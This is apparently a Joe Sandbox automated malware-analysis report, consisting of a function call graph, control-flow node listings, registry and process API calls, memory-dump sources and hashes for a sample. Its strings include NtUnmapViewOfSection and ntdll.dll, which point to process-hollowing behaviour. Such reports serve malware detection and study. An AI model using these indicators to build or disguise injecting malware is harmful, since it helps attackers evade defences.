___std_exception_copy 9237->9239 9240 bba085 9237->9240 9239->9235 9241 bba0a1 __fassign 9240->9241 9242 bba092 9240->9242 9241->9237 9242->9241 9244 bbea6d 9242->9244 9245 bbea8a 9244->9245 9247 bbea9a std::future_error::future_error 9245->9247 9248 bc07df 9245->9248 9247->9241 9249 bc07ff __fassign 9248->9249 9251 bc0852 __fassign __freea ___std_exception_copy std::future_error::future_error 9249->9251 9252 bbc66b 9249->9252 9251->9247 9254 bbc6a7 __dosmaperr 9252->9254 9255 bbc679 __dosmaperr 9252->9255 9253 bbc694 RtlAllocateHeap 9253->9254 9253->9255 9254->9251 9255->9253 9255->9254 10030 b82a10 10031 b82a1a 10030->10031 10032 b82a1c 10030->10032 10033 b9d8fa 5 API calls 10032->10033 10034 b82a22 10033->10034 10035 b89a14 10037 b89a1c shared_ptr 10035->10037 10036 b8a423 Sleep CreateMutexA 10039 b8a45e 10036->10039 10037->10036 10038 b89aef shared_ptr 10037->10038 9801 b82d00 9802 b82d28 9801->9802 9803 b9dd1b __Mtx_init_in_situ 2 API calls 9802->9803 9804 b82d33 9803->9804 9560 b81000 9561 b9ece3 RtlAllocateHeap 9560->9561 9562 b8100a 9561->9562 9563 b88800 9564 b88850 9563->9564 9565 b85d40 3 API calls 9564->9565 9566 b8886a shared_ptr std::future_error::future_error 9565->9566 9579 b82070 9584 b9dd8c 9579->9584 9582 b9ece3 RtlAllocateHeap 9583 b82084 9582->9583 9585 b9dd9c 9584->9585 9586 b8207a 9584->9586 9585->9586 9588 b9e64e 9585->9588 9586->9582 9589 b9e365 __Mtx_init_in_situ InitializeCriticalSectionEx 9588->9589 9590 b9e660 9589->9590 9590->9585 10056 b89675 10057 b89677 10056->10057 10058 b85d40 3 API calls 10057->10058 10059 b89781 10058->10059 10060 b88600 3 API calls 10059->10060 10061 b89792 10060->10061 9813 b84176 9816 b82310 9813->9816 9815 b8417f 9817 b82324 9816->9817 9820 b9cbbd 9817->9820 9828 bb517a 9820->9828 9822 b9cc35 ___std_exception_copy 9835 b9c83d 9822->9835 9823 b9cc28 9831 b9c5e6 9823->9831 9827 b8232a 9827->9815 9839 bb65b9 9828->9839 9830 b9cbe5 9830->9822 9830->9823 9830->9827 9832 b9c62f ___std_exception_copy 9831->9832 9834 b9c642 shared_ptr 9832->9834 9843 b9ca2f 9832->9843 9834->9827 9836 b9c868 9835->9836 9838 b9c871 shared_ptr 9835->9838 9837 b9ca2f 2 API calls 9836->9837 9837->9838 9838->9827 9840 bb65be ___std_exception_copy 9839->9840 9840->9830 9841 bb7c7d 3 API calls 9840->9841 9842 bba252 9841->9842 9844 b9d56f InitOnceExecuteOnce 9843->9844 9845 b9ca71 9844->9845 9846 b9ca78 9845->9846 9854 bb834b 9845->9854 9846->9834 9848 b9caae 9849 b9d56f InitOnceExecuteOnce 9848->9849 9850 b9caf1 9849->9850 9851 b9caf8 9850->9851 9852 bb834b RtlAllocateHeap 9850->9852 9851->9834 9853 b9cb2e 9852->9853 9853->9834 9856 bb8357 __dosmaperr 9854->9856 9855 bb8395 9855->9848 9856->9855 9857 bb7f7d RtlAllocateHeap 9856->9857 9858 bb83ca __freea 9857->9858 9858->9848 9152 bbc66b 9154 bbc6a7 __dosmaperr 9152->9154 9155 bbc679 __dosmaperr 9152->9155 9153 bbc694 RtlAllocateHeap 9153->9154 9153->9155 9155->9153 9155->9154 10078 b99e60 10079 b99eba ___std_exception_copy 10078->10079 10085 b9b240 10079->10085 10083 b99f69 std::_Throw_future_error 10084 b99efc std::future_error::future_error 10098 b9b580 10085->10098 10087 b9b275 10088 b82be0 2 API calls 10087->10088 10089 b9b2a6 10088->10089 10102 b9b600 10089->10102 10091 b99ee4 10091->10084 10092 b842f0 10091->10092 10093 b9d56f InitOnceExecuteOnce 10092->10093 10094 b8430a 10093->10094 10095 b84311 10094->10095 10096 bb834b RtlAllocateHeap 10094->10096 10095->10083 10097 b84324 10096->10097 10099 b9b59c 10098->10099 10100 b9dd1b __Mtx_init_in_situ 2 API calls 10099->10100 10101 b9b5a7 10100->10101 10101->10087 10103 b9b67f shared_ptr 10102->10103 10105 b9b6e8 10103->10105 10107 b9b8a0 10103->10107 10106 b9b6cb 10106->10091 10108 b9b920 10107->10108 10114 b98800 10108->10114 10110 b9bb4e shared_ptr 10110->10106 10111 b9b95c shared_ptr 10111->10110 10112 b83de0 3 API calls 10111->10112 10113 b9bb36 10112->10113 10113->10106 10115 b98841 10114->10115 10122 b83870 10115->10122 10117 b98a76 std::future_error::future_error 10117->10111 10118 b988dd ___std_exception_copy 10118->10117 10119 b9dd1b __Mtx_init_in_situ 2 API calls 10118->10119 10120 b98a31 10119->10120 10127 b82dc0 10120->10127 10123 b9dd1b __Mtx_init_in_situ 2 API calls 10122->10123 10124 b838a7 10123->10124 10125 b9dd1b __Mtx_init_in_situ 2 API calls 10124->10125 10126 b838e6 10125->10126 10126->10118 10128 b82e06 10127->10128 10131 b82e6f 10127->10131 10129 b9dd3c GetSystemTimePreciseAsFileTime 10128->10129 10130 b82e12 10129->10130 10133 b82f1e 10130->10133 10137 b82e1d __Mtx_unlock 10130->10137 10132 b82eef 10131->10132 10138 b9dd3c GetSystemTimePreciseAsFileTime 10131->10138 10132->10117 10134 b9d8fa 5 API calls 10133->10134 10135 b82f24 10134->10135 10136 b9d8fa 5 API calls 10135->10136 10139 b82eb9 10136->10139 10137->10131 10137->10135 10138->10139 10140 b9d8fa 5 API calls 10139->10140 10141 b82ec0 __Mtx_unlock 10139->10141 10140->10141 10142 b9d8fa 5 API calls 10141->10142 10143 b82ed8 __Cnd_broadcast 10141->10143 10142->10143 10143->10132 10144 b9d8fa 5 API calls 10143->10144 10145 b82f3c 10144->10145 10146 b9dd3c GetSystemTimePreciseAsFileTime 10145->10146 10156 b82f80 shared_ptr __Mtx_unlock 10146->10156 10147 b830c5 10148 b9d8fa 5 API calls 10147->10148 10149 b830cb 10148->10149 10150 b9d8fa 5 API calls 10149->10150 10151 b830d1 10150->10151 10152 b9d8fa 5 API calls 10151->10152 10158 b83093 __Mtx_unlock 10152->10158 10153 b830a7 std::future_error::future_error 10153->10117 10154 b9d8fa 5 API calls 10155 b830dd 10154->10155 10156->10147 10156->10149 10156->10153 10157 b9dd3c GetSystemTimePreciseAsFileTime 10156->10157 10159 b8305f 10157->10159 10158->10153 10158->10154 10159->10147 10159->10151 10159->10158 10160 b9d3dc GetSystemTimePreciseAsFileTime 10159->10160 10160->10159 9607 b8205a 9608 b9dd8c InitializeCriticalSectionEx 9607->9608 9609 b82064 9608->9609 9610 b9ece3 RtlAllocateHeap 9609->9610 9611 b8206e 9610->9611 10320 b9e75c 10321 b9e76b 10320->10321 10322 b9e814 10321->10322 10323 b9e810 RtlWakeAllConditionVariable 10321->10323 9612 b88450 9614 b885ba 9612->9614 9615 b884a8 shared_ptr 9612->9615 9613 b85d40 3 API calls 9613->9615 9615->9613 9615->9614 10347 b83b47 10348 b83b51 10347->10348 10349 b831d0 6 API calls 10348->10349 10350 b83b5f 10348->10350 10349->10350

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 00B85DC8 Relevance: 18.8, APIs: 3, Strings: 7, Instructions: 1325registryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 0 b85dc8-b85dd4 1 b85dea-b85e0c call b9ecf8 0->1 2 b85dd6-b85de4 0->2 10 b85e0e-b85e1a 1->10 11 b85e36-b85e3c 1->11 2->1 3 b85e82 call bb82fa 2->3 8 b85e87-b85f15 call bb82fa call bb5780 RegOpenKeyExA 3->8 28 b85f41-b85f64 RegCloseKey 8->28 29 b85f17-b85f40 RegQueryValueExA 8->29 12 b85e2c-b85e33 call b9ecf8 10->12 13 b85e1c-b85e2a 10->13 15 b85e3e-b85e4a 11->15 16 b85e66-b85e81 call b9e681 11->16 12->11 13->3 13->12 19 b85e5c-b85e63 call b9ecf8 15->19 20 b85e4c-b85e5a 15->20 19->16 20->8 20->19 30 b85f67-b85f6c 28->30 29->28 30->30 31 b85f6e-b85f85 call b99750 30->31 34 b85faf-b85fc7 31->34 35 b85f87-b85f93 31->35 36 b85fc9-b85fd5 34->36 37 b85ff1-b8600c call b9e681 34->37 38 b85fa5-b85fac call b9ecf8 35->38 39 b85f95-b85fa3 35->39 40 b85fe7-b85fee call b9ecf8 36->40 41 b85fd7-b85fe5 36->41 38->34 39->38 43 b8600d-b8605b call bb82fa 39->43 40->37 41->40 41->43 52 b8605d-b86086 43->52 53 b86087-b86096 43->53 52->53 56 b86098-b860a4 53->56 57 b860c4-b860dc 53->57 58 b860ba-b860c1 call b9ecf8 56->58 59 b860a6-b860b4 56->59 60 b860de-b860ea 57->60 61 b86106-b8611e 57->61 58->57 59->58 64 b86156-b86238 call bb82fa call b99090 call b85d40 59->64 66 b860fc-b86103 call b9ecf8 60->66 67 b860ec-b860fa 60->67 62 b86148-b86155 call b9e681 61->62 63 b86120-b8612c 61->63 68 b8613e-b86145 call b9ecf8 63->68 69 b8612e-b8613c 63->69 86 b8623a 64->86 87 b8623c-b8625b call b821c0 64->87 66->61 67->64 67->66 68->62 69->64 69->68 86->87 90 b8628c-b86292 87->90 91 b8625d-b8626c 87->91 94 b86295-b8629a 90->94 92 b8626e-b8627c 91->92 93 b86282-b86289 call b9ecf8 91->93 92->93 96 b864b7 call bb82fa 92->96 93->90 94->94 95 b8629c-b862c4 call b99090 call b85d40 94->95 107 b862c8-b862e9 call b821c0 95->107 108 b862c6 95->108 102 b864bc call bb82fa 96->102 106 b864c1-b86542 call bb82fa 102->106 113 b86548 106->113 114 b8682a-b8683e 106->114 117 b8631a-b8632e 107->117 118 b862eb-b862fa 107->118 108->107 119 b86550-b86564 113->119 115 b868e3 call b99890 114->115 116 b86844-b86869 call b99750 114->116 127 b868e8-b86a19 call bb82fa call b9a170 call b99750 115->127 132 b8686b-b86877 116->132 133 b86893-b86899 116->133 130 b863d8-b863fc 117->130 131 b86334-b8633a 117->131 122 b862fc-b8630a 118->122 123 b86310-b86317 call b9ecf8 118->123 119->115 124 b8656a-b865b4 call b99750 call b9ab00 119->124 122->102 122->123 123->117 152 b866e9-b86703 124->152 153 b865ba-b865d7 call b9ab00 124->153 217 b86a4b-b86a5d 127->217 218 b86a1b-b86a21 127->218 138 b86400-b86405 130->138 137 b86340-b8636d call b99090 call b85d40 131->137 139 b86889-b86890 call b9ecf8 132->139 140 b86879-b86887 132->140 142 b8689b-b868a7 133->142 143 b868c3-b868e2 call b9e681 133->143 186 b8636f 137->186 187 b86371-b86398 call b821c0 137->187 138->138 149 b86407-b8646c call b99750 * 2 138->149 139->133 140->127 140->139 145 b868b9-b868c0 call b9ecf8 142->145 146 b868a9-b868b7 142->146 145->143 146->127 146->145 180 b86499-b864b6 call b9e681 149->180 181 b8646e-b8647d 149->181 152->115 165 b86709-b86765 call b99750 call b9a910 152->165 153->152 172 b865dd-b865fa call b9ab00 153->172 190 b8679c-b867af 165->190 191 b86767-b86773 165->191 172->152 194 b86600-b8661d call b9ab00 172->194 188 b8648f-b86496 call b9ecf8 181->188 189 b8647f-b8648d 181->189 186->187 210 b863c9-b863cc 187->210 211 b8639a-b863a9 187->211 188->180 189->106 189->188 200 b867dd-b867e4 190->200 201 b867b1-b867bd 190->201 197 b86789-b86797 call b9ecf8 191->197 198 b86775-b86783 191->198 194->152 219 b86623-b86640 call b9ab00 194->219 197->190 198->127 198->197 212 b8680f-b8681b 200->212 213 b867e6-b867ef 200->213 207 b867bf-b867cd 201->207 208 b867d3-b867da call b9ecf8 201->208 207->127 207->208 208->200 210->137 214 b863d2 210->214 221 b863ab-b863b9 211->221 222 b863bf-b863c6 call b9ecf8 211->222 212->119 215 b86821-b86827 212->215 223 b867f1-b867ff 213->223 224 b86805-b8680c call b9ecf8 213->224 214->130 215->114 218->217 227 b86a23-b86a2f 218->227 219->152 237 b86646-b86663 call b9ab00 219->237 221->96 221->222 222->210 223->127 223->224 224->212 232 b86a41-b86a48 call b9ecf8 227->232 233 b86a31-b86a3f 227->233 232->217 233->232 235 b86a5e-b86a63 call bb82fa 233->235 237->152 243 b86669-b86686 call b9ab00 237->243 243->152 246 b86688-b866a5 call b9ab00 243->246 246->152 249 b866a7-b866c4 call b9ab00 246->249 249->152 252 b866c6-b866e3 call b9ab00 249->252 252->152 252->200
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00000001,?), ref: 00B85F0D
                                                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00B85F3B
                                                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 00B85F47
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                        • String ID: $($NtUnmapViewOfSection$VUUU$invalid stoi argument$ntdll.dll$stoi argument out of range
                                                                                                                                                                                                                                        • API String ID: 3677997916-2979661614
                                                                                                                                                                                                                                        • Opcode ID: e35067c3a75c68bb9732c276f72248155c9a72c0a609229799607dae41c579b7
                                                                                                                                                                                                                                        • Instruction ID: 0eff55c8cbb69b7d84c6592a09e04f6bd1b2a5e95e101b7a19b5c465f082e652
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e35067c3a75c68bb9732c276f72248155c9a72c0a609229799607dae41c579b7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1DA23571A002089BEF18EF68CC85BEDB7F5EF45304F1045ADF915A7292DB75AA80CB91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00BB7BBB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32(?,?,00BB7BBA,?,?,?,?,?,00BB8C0E), ref: 00BB7BF7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                                                                                        • Opcode ID: 2eebc75514d11e51f29cc86cfba19c08e574dba16ea6afa4a732c77788a518e4
                                                                                                                                                                                                                                        • Instruction ID: 9656f0e00895888c851b0558ce0d0c92aad91b58f4c0652dca07b3899fdffe3a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2eebc75514d11e51f29cc86cfba19c08e574dba16ea6afa4a732c77788a518e4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ABE08630549548AFCE357B14C878DF93B9DEB51341F000850FD0846222CFB5EC41C980
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 051F0CAD Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2144281346.00000000051F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_51f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c041415dad85de281349d153c26e8186ed89d566ba1bd7bf747097c0053eda1e
                                                                                                                                                                                                                                        • Instruction ID: 306a01a0b6b1d595c776e09dea0340cb15f36acdaa437224be225c919fcaaa0c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c041415dad85de281349d153c26e8186ed89d566ba1bd7bf747097c0053eda1e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6BF0CDDF08C120AC612AC1822B6C6B6AB2FB2CF3307328536F607E2043A7D4174D6231
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00B85D40 Relevance: 3.3, APIs: 2, Instructions: 311COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
